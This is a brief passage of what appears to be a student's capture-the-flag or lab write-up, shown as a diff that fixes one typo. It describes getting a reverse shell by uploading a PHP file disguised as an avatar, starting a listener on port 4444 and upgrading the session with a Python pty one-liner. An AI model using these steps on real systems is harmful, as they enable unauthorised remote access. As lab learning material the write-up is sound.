VanshajNathani/saic-test-2022/task1.md

 Executing the command 'netcap -lvnp 4444' in my terminal and the going to the url "<targetmachineIP>/uploads/avatar\_saic\_perfectly\_safe\_avatar.PHP" gave me a reverse shell on the target machine.
 YEAHH!!

-Firtly, I made sure to get and interactive terminal.
+Firtly, I made sure to get an interactive terminal.
 So I used python for it.
 Below is the command used.
 `/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'`

 ## VM1